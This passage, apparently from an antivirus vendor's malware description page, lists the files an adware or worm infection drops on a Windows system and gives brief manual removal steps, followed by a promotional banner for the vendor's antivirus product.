      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdate.dll (5441 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\13.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\94.js (1 bytes)
      %WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-4.job (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\211.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\64.js (2 bytes)
      %Program Files%\MPlayerplus_01\1293297481.mxaddon (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\manifest.xml (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\91.js (5520 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\207.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils.dll (25824 bytes)
      %Program Files%\MPlayerplus_01\MPlayerplus_01.ico (15 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\46.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateOnDemand.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\14.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdate.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\155.js (449 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\44.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\183.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\72.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\244.js (501 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\42.js (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\242.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\246.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
      %Program Files%\MPlayerplus_01\utils.exe (66998 bytes)
      %Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-2.exe (2105 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\md5dll.dll (6 bytes)
      %Program Files%\MPlayerplus_01\360-54246.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\update[1].json (39 bytes)
      %Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-5.exe (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateBroker.exe (46 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psuser.dll (673 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\190.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\UserInfo.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\184.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\103.js (2 bytes)
      %Program Files%\MPlayerplus_01\54246.xpi (3073 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\221.js (383 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\userCode\background.js (429 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\93.js (793 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\psmachine.dll (673 bytes)
      %WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-2.job (70 bytes)
      %Program Files%\MPlayerplus_01\background.html (729 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\22.js (8 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\ExecDos.dll (5 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\3a2f274a-d35f-47ab-8ca2-11bebfe38097.exe (3312 bytes)
      %WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-5.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\104.js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\220.js (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\233.js (797 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\37.js (2 bytes)
      %Program Files%\MPlayerplus_01\Uninstall.exe (601 bytes)
      %WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-3.job (74 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\goopdateres_en.dll (26 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\28.js (536 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\17.js (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\41.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\47.js (7 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
      %WinDir%\Tasks\772406a5-70fe-462f-841c-e18bdccbdc78-1.job (70 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\inetc.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\9.js (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\update.json (39 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\InstallerUtils2.dll (3312 bytes)
      %WinDir%\Tasks\temp_772406a5-70fe-462f-841c-e18bdccbdc78-2.job (138 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\195.js (378 bytes)
      %Program Files%\MPlayerplus_01\54246.crx (1425 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\npGoogleUpdate4.dll (1281 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleCrashHandler.exe (601 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\comh.246345\GoogleUpdateHelper.msi (32 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins.json (15 bytes)
      %Program Files%\MPlayerplus_01\772406a5-70fe-462f-841c-e18bdccbdc78-3.exe (13122 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\226.js (400 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\35.js (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\260954 (973591 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\177.js (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\extensionData\plugins\38.js (2 bytes)
      %WinDir%\system.ini (72 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\00157D19_Rar\%original file name%.exe (61184 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\StdUtils.dll (14 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (265148 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Zvbbyym.tmp (248938 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\Iufkopcpdfjpcg.exe (983586 bytes)
      %Program Files%\Common Files\Java\Java Update\jusched.exe (368 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\WrapperUtils.dll (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\263[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\223[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\286[1].js (975 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\93[1].js (951 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\281[1].js (483 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\184[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\plugins[1].json (4153 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\246[1].js (961 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\233[1].js (867 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\244[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\260[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\192[1].js (867 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bg_code[1].js (432 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\104[1].js (919 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\195[1].js (408 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\289[1].js (903 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\273[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\180[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\262[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\42[1].js (769 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\jquery-1_7_1_min[1].js (44457 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\242[1].js (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\102[1].js (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\91[1].js (86201 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\211[1].js (867 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\221[1].js (413 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\269[1].js (491 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\220[1].js (13921 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\manifest[1].xml (25 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\275[1].js (823 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app_code[1].js (736 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\230[1].js (867 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\set_campaign_id_m[1].js (508 bytes)

    4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.

    No votes yet


    Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
    © 2026 Lavasoft. All rights reserved.
    Terms Of Use |   Privacy Policy


    x

    Our best antivirus yet!

    Fresh new look. Faster scanning. Better protection.

    Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

    For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

    Download adaware antivirus 12
    No thanks, continue to lavasoft.com
    close x

    Discover the new adaware antivirus 12

    Our best antivirus yet

    Download Now